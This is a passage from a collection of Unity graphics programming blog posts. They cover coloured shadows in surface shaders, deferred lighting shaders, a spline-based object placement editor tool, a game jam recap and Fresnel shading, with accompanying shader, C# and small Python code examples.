That’s really all there is to it. You may need to watch the profiler for a bit to get a sense of exactly how much time you’re burning transferring data to and from the cpu, but I’ve found that once you’re operating on a big enough data set compute shaders really pay dividends.
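One detail worth a second look is the group count. The Dispatch calls above launch data.Length groups of 16 threads each, which is more threads than there are elements. A common alternative is to round the element count up to a whole number of groups, sketched here in Python (groups_needed is a hypothetical helper, not a Unity function). A kernel launched this way would typically also check its index against the buffer length, since the last group can run past the end.

```python
THREADS_PER_GROUP = 16  # matches [numthreads(16,1,1)] in the Multiply kernel


def groups_needed(element_count, threads_per_group=THREADS_PER_GROUP):
    """Smallest number of thread groups that covers every element (ceiling division)."""
    return (element_count + threads_per_group - 1) // threads_per_group


element_count = 5
print(groups_needed(element_count))       # groups when rounding up
print(element_count * THREADS_PER_GROUP)  # threads launched by Dispatch(kernel, 5, 1, 1)
```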

One last thing - once you’re done working with your buffer, you should call buffer.Dispose() to make sure the buffer can be GC’ed. (Thanks to Andreas S for e-mailing me with this addition, and a few other corrections!).

If you have any questions about this (or spot a mistake in what’s here), send me a message on twitter. I won’t write shaders for you, but I’m happy to point you in the right direction for your specific use case. Happy shading!

Colouring Shadows in Unity

2014-05-16T00:00:00+00:00

If you’ve ever looked for help getting different coloured shadows in your Unity game, you were probably surprised by how little there is on the forums in the way of help. In fact, at the time of writing this, the most help that google turned up was a $50 package on the asset store. Colouring shadows is not that hard, in fact, it’s only a few lines of shader code.

This post is going to show you a really simple way to get some really groovy shadows in Unity.

I added water to make this seem more impressive.

Time to Get Fabulous

To make this simple, we’re going to be writing a surface shader today. It’s important to note that the shader we’re writing will set the colour of the shadows being received by the object being shaded, not the colour of the shadows cast by that object onto others. If you want the ground to show coloured shadows, the ground needs to have a shadow colouring shader. In the image above, both the sphere and the ground have the shader applied.

Let’s add coloured shadows to the default diffuse shader that comes with unity. First off, we’ll need the source for that. You can grab the source for all the built in shaders in Unity from their downloads page.

The default diffuse shader is in a file called Normal-Diffuse.shader. So let’s open it up, and copy the contents into a new shader in Unity:

Shader "Colored Diffuse" {
Properties {
	_Color ("Main Color", Color) = (1,1,1,1)
	_MainTex ("Base (RGB)", 2D) = "white" {}
}
SubShader {
	Tags { "RenderType"="Opaque" }
	LOD 200

CGPROGRAM
#pragma surface surf Lambert

sampler2D _MainTex;
fixed4 _Color;

struct Input {
	float2 uv_MainTex;
};

void surf (Input IN, inout SurfaceOutput o) {
	fixed4 c = tex2D(_MainTex, IN.uv_MainTex) * _Color;
	o.Albedo = c.rgb;
	o.Alpha = c.a;
}
ENDCG
}

Fallback "VertexLit"
}

If you throw this on a material it should, unsurprisingly, look exactly like the “Diffuse” shader that comes with Unity. Now it’s time to have some fun. We’re going to need to write our own lighting function to get the shadows the colour we want them. Right now the shader is using the built in “Lambert” function, and ideally, our lighting should look exactly like it, just more fabulous. The easiest way to do this is to just grab the source for the Lambert function and modify that directly.

That built in shaders folder you downloaded also has the source code for the lighting functions (inside the file Lighting.cginc). If you open it up, and ctrl+f for “Lambert” you’ll find what we’re looking for. Let’s paste that into our shader as well:

CGPROGRAM
#pragma surface surf CSLambert
sampler2D _MainTex;

struct Input {
	float2 uv_MainTex;
};

half4 LightingCSLambert (SurfaceOutput s, half3 lightDir, half atten) {

	fixed diff = max (0, dot (s.Normal, lightDir));

	fixed4 c;
	c.rgb = s.Albedo * _LightColor0.rgb * (diff * atten * 2);
	c.a = s.Alpha;
	return c;
	}

void surf (Input IN, inout SurfaceOutput o) {
	half4 c = tex2D (_MainTex, IN.uv_MainTex);
	o.Albedo = c.rgb;
	o.Alpha = c.a;
}

ENDCG

You’ll notice I changed the name of the lighting function (and the #pragma line which specifies which function to use). This is just to avoid confusion with the original Lambert function.

The lighting function is responsible for outputting the final colour of the object, which includes the colour of the shadowed area. The atten term you see above is the shadow multiplier: the higher the atten value, the brighter the surface, while a low value means the fragment is in shadow. The lower the atten value, the darker the shadow.

Since we know that any atten value less than 1.0 means that the fragment is in shadow, subtracting atten from 1.0 will give us the strength that the shadow colour needs to be. Lighter shadows (a higher atten) will naturally have a lighter shadow colour.

half4 LightingCSLambert (SurfaceOutput s, half3 lightDir, half atten) 
{

	fixed diff = max (0, dot (s.Normal, lightDir));

	fixed4 c;
	c.rgb = s.Albedo * _LightColor0.rgb * (diff * atten * 2);
	
	//shadow colorization
	c.rgb += _ShadowColor.xyz * (1.0-atten);
	
	c.a = s.Alpha;
	return c;
}

Make sure that you also add the _ShadowColor color property to the shader, and as a uniform inside your CG Program. Then throw this shader onto one of your objects, and watch the magic happen.
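To see what that extra line does to the numbers, here is the same lighting equation written out in Python for a single fragment. It is only a sketch of the arithmetic: colours are plain RGB tuples, diff stands for max(0, dot(normal, lightDir)), and the function name is invented for the example.

```python
def lambert_with_shadow(albedo, light_color, shadow_color, diff, atten):
    """RGB result of the modified Lambert function for one fragment."""
    lit = [a * l * (diff * atten * 2) for a, l in zip(albedo, light_color)]
    # Shadow colorization: the lower atten is, the more shadow colour is added.
    return [c + s * (1.0 - atten) for c, s in zip(lit, shadow_color)]


grey = (0.5, 0.5, 0.5)
white_light = (1.0, 1.0, 1.0)
purple_shadow = (0.2, 0.0, 0.4)

print(lambert_with_shadow(grey, white_light, purple_shadow, diff=1.0, atten=1.0))  # fully lit
print(lambert_with_shadow(grey, white_light, purple_shadow, diff=1.0, atten=0.0))  # fully shadowed
```

A fully lit fragment is untouched, while a fully shadowed one ends up as exactly the shadow colour.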

You may have noticed that the above change doesn’t account for diffuse shadows, that is, unlit sides of a diffuse material. You end up with a really weird looking dissonance between the object’s dark areas, and the areas that are receiving shadows.

Notice the difference between the areas being self shadowed, and the areas that are unlit.

This happens because although the atten value tells us if we’re being shadowed by another object, it doesn’t account for a fragment being dark as a result of its own lighting function. In the case of a diffuse material, this is when it is pointing away from all relevant light sources.

What we need is to have our shadow colouring take into account both the atten value and the lighting. We can do that like so:

half4 LightingCSLambert (SurfaceOutput s, half3 lightDir, half atten) 
{
	fixed diff = max (0, dot (s.Normal, lightDir));

	fixed4 c;
	c.rgb = s.Albedo * _LightColor0.rgb * (diff * atten * 2);
	
	//shadow colorization
	c.rgb += _ShadowColor.xyz * max(0.0,(1.0-(diff*atten*2))) * _DiffuseVal;
	c.a = s.Alpha;
	return c;
}
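The difference between the two versions is easiest to see by comparing just the multiplier applied to the shadow colour. The Python sketch below does that for three kinds of fragment. The function names are made up, and _DiffuseVal is treated here as a plain strength multiplier defaulting to 1.0, which is an assumption on my part.

```python
def shadow_term_atten_only(atten):
    """Multiplier from the first version: only cast shadows count."""
    return 1.0 - atten


def shadow_term_with_diffuse(diff, atten, diffuse_val=1.0):
    """Multiplier from the second version: darkness from the lighting itself counts too."""
    return max(0.0, 1.0 - (diff * atten * 2)) * diffuse_val


cases = {
    "fully lit":          (1.0, 1.0),  # (diff, atten)
    "in a cast shadow":   (1.0, 0.0),
    "facing away, unlit": (0.0, 1.0),
}

for name, (diff, atten) in cases.items():
    print(name, shadow_term_atten_only(atten), shadow_term_with_diffuse(diff, atten))
```

The unlit side is the case that changes: the first version gives it no shadow colour at all, while the second treats it the same as a cast shadow.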

Put it all together and you should end up with the most fabulous shadow colours you’ve ever seen!

Extending this to other shaders is very similar to what we did here: simply grab the source for the shader you want to modify from the built in shader source, and modify the lighting function to add shadow colour based on that specific lighting function’s equation.

Writing Shaders for Deferred Lighting in Unity3D

2014-04-05T00:00:00+00:00

A while ago, I wrote a post called Writing Multi Light Pixel Shaders in Unity, and covered the basics of how to write shaders that use a whole bunch of lights in forward rendering. This post is the (8 months late) sequel to that post, in which I’m going to talk about the basics of writing shaders for deferred lighting in Unity.

Unlike last time though, we’re going to be writing surface shaders today; I’ll explain why that is below. If you’re unfamiliar with surface shaders, now would probably be a good time to head over to the Unity docs and read up a little bit. Don’t worry about grokking all of it though, we aren’t doing anything fancy today.

If you’re dead set on writing pixel shaders that work with deferred lighting, check out my post on that here

A quick demo of deferred lighting: all 16 lights in the scene are treated as pixel lights

It seems easiest to start by describing how forward rendering and deferred lighting work so that we can see how they differ from one another, and understand what our shaders are actually doing in the deferred rendering path.

A Very Brief Intro to Forward Rendering

In traditional forward rendering, each object is drawn once for every pixel light that touches it (with all the vertex lights being lumped into the base pass). Each pass works independently of the other passes, and runs a vertex and a fragment shader to do its magic (and then adds that result to the previous passes).

This works great for simple scenes, but when you need to have a large number of lights it can get bogged down pretty quickly. To use draw calls as an example: in forward rendering your draw call count is (roughly) numberOfObjects * numberOfLights.

For example, the screenshot above has 16 spheres, each being lit by 16 pixel lights. Predictably, this results in 256 draw calls, as shown in the stats window:

Normally unity would be using a bunch of tricks to minimize those draw calls, by batching calls, and automatically setting some lights to vertex lights, but I’ve turned all that off for demonstration purposes.

So if forward rendering chokes with tons of lights, how do games render scenes with hundreds of lights in them? That’s where deferred techniques come in.

A Brief Intro to Deferred Lighting

Deferred lighting solves the problem of handling a large number of lights by assuming that all objects use the same lighting model, and then calculating the lighting contribution to each pixel on the screen in a single pass. This allows the rendering speed to be dependent on the number of pixels being rendered, not the objects in the scene.

As described in greater detail in the docs, Unity’s deferred lighting system is a 3 step process.

Step 1: initial data buffers are constructed. These buffers consist of a depth buffer (Z-Buffer), and a buffer containing the specular power and normals of the objects visible to the camera (G-Buffer).

Step 2: the previously built buffers are combined to compute the lighting for each pixel on the screen.

Step 3: all of the objects are drawn again. This time, they are shaded with a combination of the computed lighting from step 2 and their surface properties (texture, colour, lighting function, etc).

As you may have guessed, this technique comes with much more overhead than forward rendering, but it also scales much better for complex scenes. To relate things back to draw calls, each object produces 2 draw calls, and each light produces 1 call (+1 for lightmapping). Thus, the example scene from above ends up being roughly 16 ∗ 2 + 16 ∗ 2 = 64 draw calls. Unity’s window says 65 draw calls; don’t ask me where that extra one came from.
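Putting the two rough formulas side by side makes the scaling difference obvious. The Python sketch below uses the same approximations as the text (objects times lights for forward, two calls per object plus two per light for deferred); the function names are just for illustration and real numbers from Unity’s stats window will differ.

```python
def forward_draw_calls(objects, pixel_lights):
    """Rough forward rendering estimate: one pass per object per pixel light."""
    return objects * pixel_lights


def deferred_draw_calls(objects, lights):
    """Rough deferred lighting estimate: 2 calls per object, 2 per light."""
    return objects * 2 + lights * 2


for count in (16, 100):
    print(count, forward_draw_calls(count, count), deferred_draw_calls(count, count))
```

With 16 objects and 16 lights that works out to 256 against 64, and the gap widens quickly as the scene grows.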

It’s worth noting that draw calls really aren’t a great way to measure how performant a rendering technique is, but they’re a useful way to understand how these techniques differ from one another. In actuality, it’s more useful to say that forward rendering’s performance is dependent on the number of lights and objects in a scene, whereas deferred lighting’s performance is dependent on the number of lights and the number of pixels being lit on the screen.

One final thing: Unity uses “deferred lighting” (aka Light Pre-Pass), which is different from the confusingly similarly named “deferred rendering.” I won’t go into the differences here, but just be aware of this so you’re not confused later.

So about those shaders...

As you also may have noticed from the above description, deferred lighting assumes that all objects use the same lighting model. This doesn’t mean that objects can’t appear to be lit differently, but it does mean that things like light attenuation and how the diffuse and specular terms are calculated are uniform across all objects.

As such, one of the tradeoffs with deferred lighting is a loss of control in your shaders. Since the lighting model is uniform across all objects, we no longer get to define that per shader.

In light of this, surface shaders are the best way to tackle writing custom shaders for deferred lighting. They’re already set up to work with Unity’s system, and enforce the restrictions we’re working with by design.

Let's write something already

To start off, create a new shader. Unity will give you a skeleton of a surface shader. I’ll post it here for those of you not playing along at home:

Shader "Custom/DeferredDiffuse"
{
Properties 
{
	_MainTex ("Base (RGB)", 2D) = "white" {}
}
SubShader 
{
	Tags { "RenderType"="Opaque" }
	LOD 200
	
	CGPROGRAM
	#pragma surface surf Lambert

	sampler2D _MainTex;

	struct Input {
		float2 uv_MainTex;
	};

	void surf (Input IN, inout SurfaceOutput o) {
		half4 c = tex2D (_MainTex, IN.uv_MainTex);
		o.Albedo = c.rgb;
		o.Alpha = c.a;
	}
	ENDCG
} 
}

Out of the box, Unity’s built in lighting functions will all work fine with deferred lighting, so technically, the above is a fully functioning diffuse deferred shader.

Here’s how this plays out in deferred lighting (roughly):

The surface function defines all the material specific properties for this object
Unity computes the lighting buffer. If the surface function writes to a variable used in one of these buffers (like the fragment’s normal), the data for the buffer comes from the surface function instead of the raw geometry.
The Lambert lighting function controls how the lighting buffer and object’s surface properties get combined into the final output for the current fragment.

Now, using the built in Lambert lighting function is cheating a bit, so let’s see how to write our own diffuse lighting function:

float4 LightingMyDiffuse_PrePass(SurfaceOutput i, float4 light)
{
	return float4(i.Albedo * light.rgb, 1.0);
}

This is very similar to writing lighting functions for forward rendering. All you have to do is add “_PrePass” to the end of the function name, and change the input arguments to take the output struct from your surface function and a single float4 for the combined lighting at that pixel.
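To show where that float4 of combined lighting might come from, here is a heavily simplified Python model of one pixel going through the process. It assumes the lighting buffer is just a sum of N·L times light colour over all lights, with no attenuation or specular term, which is my simplification and not Unity’s actual implementation. Only my_diffuse_prepass mirrors the function above; the other names are invented.

```python
def dot(a, b):
    return sum(x * y for x, y in zip(a, b))


def lighting_buffer(normal, lights):
    """Accumulate a diffuse contribution from every (direction, colour) light."""
    total = [0.0, 0.0, 0.0]
    for direction, colour in lights:
        n_dot_l = max(0.0, dot(normal, direction))
        for i in range(3):
            total[i] += n_dot_l * colour[i]
    return tuple(total)


def my_diffuse_prepass(albedo, light):
    """Mirror of LightingMyDiffuse_PrePass: albedo times accumulated light, alpha 1."""
    return tuple(a * l for a, l in zip(albedo, light)) + (1.0,)


normal = (0.0, 0.0, 1.0)
lights = [
    ((0.0, 0.0, 1.0), (1.0, 0.0, 0.0)),   # red light facing the surface
    ((0.0, 0.0, -1.0), (0.0, 1.0, 0.0)),  # green light behind the surface
]

light = lighting_buffer(normal, lights)
print(my_diffuse_prepass((0.5, 0.5, 0.5), light))
```

The point of the split is that the per-light loop happens once per pixel, and the lighting function only ever sees the final sum.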

That’s really all there is to it. For completeness’ sake, here’s the full shader, and how it looks:

Shader "Custom/DeferredDiffuse"
{
Properties 
{
	_MainTex ("Base (RGB)", 2D) = "white" {}
}
SubShader 
{
	Tags { "RenderType"="Opaque" }
	LOD 200
	
	CGPROGRAM
	#pragma surface surf MyDiffuse

	sampler2D _MainTex;

	struct Input {
		float2 uv_MainTex;
	};

	void surf (Input IN, inout SurfaceOutput o) {
		half4 c = tex2D (_MainTex, IN.uv_MainTex);
		o.Albedo = c.rgb;
		o.Alpha = c.a;
	}
	
	float4 LightingMyDiffuse_PrePass(SurfaceOutput i, float4 light)
	{
		return float4(i.Albedo * light.rgb, 1.0);
	}
	ENDCG
} 
}

Conclusion

So there you have it, a custom diffuse shader for deferred lighting! Surface shaders really aren’t as much fun as regular pixel shaders (imo), but they definitely fit the bill in this case.

If you notice any errors, have a good system worked out for writing non surface shaders with Unity’s deferred path, or just want to say hi, send me a message on twitter. Happy coding!

A Spline Based Object Placement Tool

2014-03-30T00:00:00+00:00

I’m convinced that one of the secrets to levelling up your Unity skills is to become very comfortable writing custom editor tools. Every project I’ve worked on in the past year has been made significantly better by building tools to automate repetitive or time consuming tasks.

For example, imagine you are working on a project which requires placing gems at even distances (like coins in Temple Run, or rings in Sonic). Placing all of these by hand isn’t a good use of anyone’s time, and making changes to these layouts sucks because moving a gem in the middle of a row means that everything after it needs to be adjusted as well.

A tool that automatically places objects at even spaces along a spline would not only allow you to get the objects placed faster, but make it way easier to make changes later. This post is going to show you the basics of how to put a tool like this together.

(there’s a unitypackage download at the end of this post if you just want the code).

The General Idea

The tool we’re building is fairly simple, but there are a few different parts we need to set up. We’ll cover these in order:

A way to make a spline
A way to manipulate (and see) our spline
A way to place objects on the spline, and manage these objects

Making a Spline

I could probably write a few blog posts just covering different spline creation algorithms, but thankfully the Unity wiki has us covered here. Head over there and grab the Interpolate.cs script. This will handle all the complicated parts of creating our spline for us. All that’s left for us is to define the inputs.

If you look at Interpolate.cs, you’ll find the method that we’ll be using to generate our splines:

IEnumerable<Vector3> NewCatmullRom(Transform[] nodes, int slices, bool loop)

So the inputs we need are an array of nodes (the initial control points that will define the shape of our spline), the number of slices (points placed between these initial nodes), and whether or not we want our spline to loop. Our tool will also need the GameObject we want to duplicate along the path.
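If you are curious what a function with those inputs does internally, here is a small Python sketch of a uniform Catmull-Rom spline. This is not the code from Interpolate.cs; it is a generic version written for illustration, with points as plain tuples, end nodes repeated when the spline does not loop, and function names of my own choosing.

```python
def catmull_rom_point(p0, p1, p2, p3, t):
    """Uniform Catmull-Rom interpolation between p1 and p2 for t in [0, 1]."""
    t2, t3 = t * t, t * t * t
    return tuple(
        0.5 * ((2 * b) + (-a + c) * t
               + (2 * a - 5 * b + 4 * c - d) * t2
               + (-a + 3 * b - 3 * c + d) * t3)
        for a, b, c, d in zip(p0, p1, p2, p3)
    )


def catmull_rom(nodes, slices, loop=False):
    """Yield every node plus `slices` extra points between each pair of neighbours."""
    n = len(nodes)
    if n < 2:
        return

    def node(i):
        # Wrap around for a looping spline, otherwise clamp to the end nodes.
        return nodes[i % n] if loop else nodes[min(max(i, 0), n - 1)]

    segments = n if loop else n - 1
    for i in range(segments):
        for k in range(slices + 1):
            t = k / (slices + 1)
            yield catmull_rom_point(node(i - 1), node(i), node(i + 1), node(i + 2), t)
    yield node(segments)  # final node, or the first node again when looping


nodes = [(0.0, 0.0, 0.0), (1.0, 2.0, 0.0), (3.0, 0.0, 0.0)]
open_points = list(catmull_rom(nodes, slices=1))
loop_points = list(catmull_rom(nodes, slices=1, loop=True))
print(len(open_points), len(loop_points))
```

The useful property for a placement tool is that the curve passes through every control node, so moving a node moves the path in a predictable way.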

However, none of the logic regarding what these inputs are should be put into Interpolate.cs, which means it’s time for us to start writing our custom tool class.

Seeing and Manipulating the Spline

So as mentioned, the first thing our tool will need to do is provide inputs to the Interpolate class. So let’s set that up:

public class SplinePlacer : MonoBehaviour
{
	public Transform[] initialNodes;
	public int curveResolution;
	public bool loop;
	public GameObject objectToPlace;
}

You can go ahead and set these up in the inspector if you want, although you won’t see anything yet, so perhaps we should also set up the gizmos to visualize the spline. Gizmos (for those who are unfamiliar with them) are objects which are drawn in the scene view but do not appear in your actual game. We’re going to be using the Gizmo api to draw our spline.

To write a custom gizmo for a component, you need to implement the OnDrawGizmos method. Let’s start by drawing a sphere at every initial node point, so that we don’t need the Transform objects we’re supplying to have a mesh renderer attached to them. The code below allocates a Vector3[] array that isn’t really being used in this example, but we will be using this array later, so I’ve included it now to avoid needing to change code as we go.

void OnDrawGizmos()
{
	Vector3[] initialPoints = new Vector3[initialNodes.Length];
	for (int i = 0; i < initialNodes.Length; i++)
	{
		initialPoints[i] = initialNodes[i].position;
		Gizmos.DrawWireSphere(initialPoints[i], 0.1f);
	}
}

If you switch back to the editor, and add a few empty GameObjects to the list of initialNodes, you should now have shiny wireframe spheres in the scene view to help you see what’s going on.

Great! Now let’s get on with the business of actually seeing our spline.

To do this, we need to create a spline on every call of the OnDrawGizmos method, and draw a line segment between each node on the newly created spline (we create a new spline on every call so that we can see the updates to the spline as we move the nodes in the scene view).

void OnDrawGizmos()
{
	if (initialNodes == null) return;
	if (initialNodes.Length < 2) return;

	Vector3[] initialPoints = new Vector3[initialNodes.Length];
	for (int i = 0; i < initialNodes.Length; i++)
	{
		initialPoints[i] = initialNodes[i].position;
		Gizmos.DrawWireSphere(initialPoints[i], 0.15f);
	}
	IEnumerable<Vector3> spline = Interpolate.NewCatmullRom(initialNodes, 
								curveResolution, 
								loop);
	IEnumerator iterator = spline.GetEnumerator();
	iterator.MoveNext();
	var lastPoint = initialPoints[0];
	while (iterator.MoveNext())
	{
		Gizmos.DrawLine(lastPoint, (Vector3)iterator.Current);
		lastPoint = (Vector3)iterator.Current;
		
		//prevent an infinite loop if we want our spline to loop
		if (lastPoint == initialPoints[0]) break;
	}
}

If you compile this, and throw a few control points into the inspector panel, you should be able to drag them around and see something like this:

Although this looks cool, it really isn’t useful yet, which brings us to part 3:

Placing Objects on the Spline

The most common use case I’ve found for this type of tool is placing objects along the spline while setting up the scene (ie/ before runtime), so that’s what we’ll cover here.

I’ve found the most intuitive way to handle this is to write a custom inspector for the SplinePlacer class that draws a button that triggers the placement action. So let’s do that now:

using UnityEngine;
using UnityEditor;
using System.Collections;
[CustomEditor(typeof(SplinePlacer))]
public class SplinePlacerEditor : Editor 
{
	public override void OnInspectorGUI()
	{
		DrawDefaultInspector();
		if (GUILayout.Button("Place Objects"))
		{
			SplinePlacer placer = (SplinePlacer)target;
			placer.PlaceObjects();
		}
	}
}

This code won’t compile yet, because we haven’t defined the PlaceObjects method in SplinePlacer, so go ahead and add an empty method with that name now. Once you’ve done that, throw this new inspector class into your Editor folder and let it compile. If you click back to your spline placer object it should look something like this:

Now all that’s left is to actually have PlaceObjects do something and we’re good to go. This gets a bit hairy, especially because I’m duplicating a lot of code so that I can present a self contained method for this tutorial, but the algorithm is as follows:

Place an object at the first control point
Traverse a distance along the spline (distanceBetweenObjects, a public float field that needs to be added to SplinePlacer)
When we have moved far enough along, place another object
continue this process until we reach the end of the spline

And an implementation of this might look like this:

public void PlaceObjects()
{
//To make things easier to understand
//we're going to parse the spline into a 
//list of Vector3s instead of using the iterator
IEnumerable<Vector3> spline = Interpolate.NewCatmullRom(initialNodes, 
							curveResolution, 
							loop);
IEnumerator iterator = spline.GetEnumerator();
List<Vector3> splinePoints = new List<Vector3>();
while (iterator.MoveNext())
{
	splinePoints.Add((Vector3)iterator.Current);
}

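//a spacing of zero (or less) would never advance along
//the spline, so bail out rather than loop forever
if (distanceBetweenObjects <= 0f) return;

//distanceToMove represents how much farther
//we need to progress down the spline before
//we place the next object
int nextSplinePointIndex = 1;
float distanceToMove = distanceBetweenObjects;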

//our current position on the spline
Vector3 positionIterator = splinePoints[0];

//our algo skips the first control point, so 
//we need to manually place the first object
GameObject.Instantiate(objectToPlace, positionIterator, Quaternion.identity);
while(nextSplinePointIndex < splinePoints.Count)
{
	Vector3 direction = (splinePoints[nextSplinePointIndex] - positionIterator);
	direction = direction.normalized;
	float distanceToNextPoint = Vector3.Distance(positionIterator, 
						splinePoints[nextSplinePointIndex]);
	if (distanceToNextPoint >= distanceToMove)
	{
		positionIterator += direction*distanceToMove;

		GameObject.Instantiate(objectToPlace, 
						positionIterator, 
						Quaternion.identity);
		distanceToMove = distanceBetweenObjects;
	}
	else
	{
		distanceToMove -= distanceToNextPoint;
		positionIterator = splinePoints[nextSplinePointIndex++];
	}
}
}

Once this code compiles, pressing the “Place Objects” button should populate your spline with the object you provided to be duplicated.

YAY! :D

Where to go next

Depending on your needs, there are a ton of different ways to improve on this tool. One addition I’ve found useful is to bind a keyboard shortcut to the act of creating another initial node, adding it to the end of the list of nodes, and selecting it in the hierarchy. This simplifies the process of creating paths greatly.

Another option I’ve found handy in some cases is to automatically select all the spawned objects after placing them, allowing a really quick group edit of their components.

You may also want to write additional inspector buttons for doing things like deleting all spawned children, or serializing their positions, or any of a million other things that might make your specific use case better. There isn’t a “right” way to go about this, as long as your life is better when you’re done the tool.

If you’re running into any issues getting things to work, feel free to grab this unitypackage, which contains all of the code presented above. If you’re still running into issues, or you have tools of your own that you want to share, send me a message on twitter!

On Bacon Jam and Grilling Virtual Meat

2014-03-24T00:00:00+00:00

NOTE: This article is OLD! Information in it may be out of date or outright useless, and I have no plans to update it. Beware!

Weekend game jams aren’t usually my thing. Generally speaking, I like having the weekend to recharge, and spending all of one getting little sleep and feverishly working to finish a (usually) throwaway project is not usually tempting. However, last weekend Reddit hosted the Bacon Jam, and I decided to partake since it had been awhile since I had actually finished a game and I felt like getting some momentum back.

The theme of the jam was “Hungry,” and I decided to make a game about grilling meat, because winter has been way too long and cold here in Ontario, and barbeque weather can’t get here fast enough. Although the jam technically ended on Sunday night, I knew that I had other things I needed to get done, and as such would be finishing on Saturday. I also knew I liked sleep, and had no intention of pulling a crazy caffeine fuelled coding binge (like I’ve done at most game jams). The end result was a very small game, that I finished leisurely well before the end of Saturday, and I ended up having a ton of fun doing things this way.

My entry for Bacon Jam 7

Everyone says set your scope small when you’re at a jam, but I think the real secret to enjoying a game jam (and not just finishing it) is to set your project’s scope small enough to be completed within the first half of the jam. If you’re still feeling in the groove, you now have a ton of time to polish your project, and if you aren’t, you can pack up, or socialize, or do whatever the hell you want, and you still walk out of the jam with a finished product.

Aside from discovering a new, much more enjoyable, way to jam, what I found interesting about this weekend was that my project would have been pretty much impossible for me to complete a year ago, given that the core mechanic relies on a shader to pan between three textures (raw, cooked, burnt) on each fragment of meat, and a year ago I was still about 2 months out from really getting anywhere with shader dev. What a difference a year makes!

So, if you’ve been missing the feeling of cooking meat over an open flame lately, check out my game: Zen Burnt (a play on the name Zen Bound), just keep your hopes down :P it’s a very very tiny jam game.

Also, I’ll get back to posting every other week or so now. Things got a bit derailed this month because I started a new job (hurray shader dev!), but I already have a much more typical tutorial post in the works for later this week. If ray/triangle intersection sounds interesting to you, check back this weekend!

Finally, as always, send me a message on twitter if you feel like it!

The Basics of Fresnel Shading

2014-02-18T00:00:00+00:00

NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore. Beware!

I recently stumbled on the awesome article: Everything Has Fresnel (if you haven’t read it, go read it now). The main premise of the article is that real world materials are not actually as neat and tidy as programmers would like to believe, and more specifically, that virtually everything in real life has some degree of fresnel reflectivity.

Fresnel isn’t an effect that I’ve seen often in Unity projects and in fact wasn’t an effect that I was familiar with building, so I decided to kill two birds with one project and put together my latest shader pack: Fresnel Shaders. It’s all free to use, MIT license, all that jazz, so enjoy :D

But, as usual, I’d also like to make things a bit easier for the next googler looking for an intro to Fresnel reflection. So if writing Fresnel shaders (or adding Fresnel to existing ones) sounds as much fun to you as it was for me, read on!

An unlit Fresnel shader

What is the Fresnel Effect

In essence, the fresnel effect describes the relationship between the angle that you look at a surface and the amount of reflectivity you see. This is very easy to demonstrate if you have a window nearby. If you look at the window straight on you can see through the window as intended, however, if you move so that you try to look through the window at a glancing angle (ie: your view direction is approaching parallel to the window’s surface) the window becomes much closer to a mirror.

But this effect isn’t limited to windows, or even particularly shiny objects. As John Hable points out in Everything Has Fresnel, pretty much everything (including towels and bricks!) exhibits the fresnel effect to some degree. I’ve made a game out of trying to spot instances of it as I walk to work (without looking like I’ve lost my mind).

So what does this look like when added to an object in Unity? Here’s a few more examples from my shader pack:

The Shaders in the Fresnel Shader Pack

How is it implemented?

As it turns out, Fresnel equations are complicated, way more so than can be adequately covered by a blog post, and way more than is feasible to execute in real time for most applications. In practice, it’s far more realistic to use an approximation of these equations. In searching, I’ve found two such approximations that seem appropriate for use in real time shaders.

The first is the Schlick Approximation. This is easy enough to google for, but I’ll put it here just for reference as well:

R(θ) = R₀ + (1 - R₀)(1 - cosθ)⁵

In the above equation, R₀ refers to the reflection coefficient for light hitting the interface between 2 media with different refractive indices head on (most commonly, air and whatever type of material the surface is), and θ is the angle between the view direction and the surface normal. If you’re really interested, definitely check out more detailed sources online. In practice, I’ve found that while this method gives decent looking results, the next option gives us much greater control over the appearance of our materials at the cost of physical correctness. Given that real time graphics are anything but physically correct, I’m ok with this tradeoff.

The second approximation comes from chapter 7 of the Cg Tutorial from NVidia, which refers to it as the “Empirical Approximation.”

R = max(0, min(1, bias + scale * (1.0 + I • N)^power))

R is a Fresnel term describing how strong the Fresnel effect is at a specific point
I is the vector from the eye to a point on the surface
N is the world space normal of the current point
bias, scale and power are values exposed to allow control over the appearance of the Fresnel effect
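
As a CPU-side illustration of the same equation, here is a minimal C++ sketch. Vec3, dot and empiricalFresnel are hypothetical names for this example, and both I and N are assumed to be normalized. Clamping the base of the power to zero is an extra safety step that is not part of the original equation; it only guards against tiny negative values from floating point error.

```cpp
#include <algorithm>
#include <cmath>

// Hypothetical minimal vector type for the example.
struct Vec3 { float x, y, z; };

static float dot(Vec3 a, Vec3 b) { return a.x * b.x + a.y * b.y + a.z * b.z; }

// I: normalized vector from the eye to the surface point.
// N: normalized surface normal.
// Returns R clamped to [0, 1], as in the max/min form of the equation.
float empiricalFresnel(Vec3 I, Vec3 N, float bias, float scale, float power)
{
    // 1 + I.N is 0 when looking straight at the surface and 1 at a grazing angle.
    float base = std::max(0.0f, 1.0f + dot(I, N));
    float r = bias + scale * std::pow(base, power);
    return std::max(0.0f, std::min(1.0f, r));
}
```

With bias = 0 and scale = 1, a head-on view returns 0 and a grazing view returns 1, and power controls how quickly the effect falls off in between.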

This equation is a bit of a double edged sword. It’s very easy to make hideous looking Fresnel by tweaking the values of bias, scale and power, but it also gives you the ability to fine tune your materials to exactly how you want them to look.

Fresnel gone wrong

A Fresnel Shader

So what does this look like in a shader? It’s actually very simple. First, you need to calculate the value of R. For this example, we’ll do that in the vertex shader:

vOUT vert(vIN v)
{
	vOUT o;
	o.pos = mul(UNITY_MATRIX_MVP, v.vertex);
	o.uv = v.texcoord;

	float3 posWorld = mul(_Object2World, v.vertex).xyz;
	float3 normWorld = normalize(mul(float3x3(_Object2World), v.normal));

	float3 I = normalize(posWorld - _WorldSpaceCameraPos.xyz);
	//saturate clamps R to [0,1], matching the max/min in the equation
	o.R = saturate(_Bias + _Scale * pow(1.0 + dot(I, normWorld), _Power));

	return o;
}

There isn’t too much to say about this, since it’s pretty much the equation above verbatim. One handy tip though: I’ve found that I’ve been perfectly happy with the results I get if I omit the bias parameter entirely, and doing so makes it more difficult to produce wonky results.

Once you have the R value calculated, the rest of the implementation is just a lerp in the fragment shader:

float4 frag(vOUT i) :  COLOR
{  
	float4 col = tex2D(_MainTex, i.uv.xy * _MainTex_ST.xy + _MainTex_ST.zw);
	return lerp(col,_Color, i.R);
}

If you’re not a Unity programmer, ignore all the _MainTex_ST stuff, that’s just a unity specific bit of code to handle tiling textures across an object.

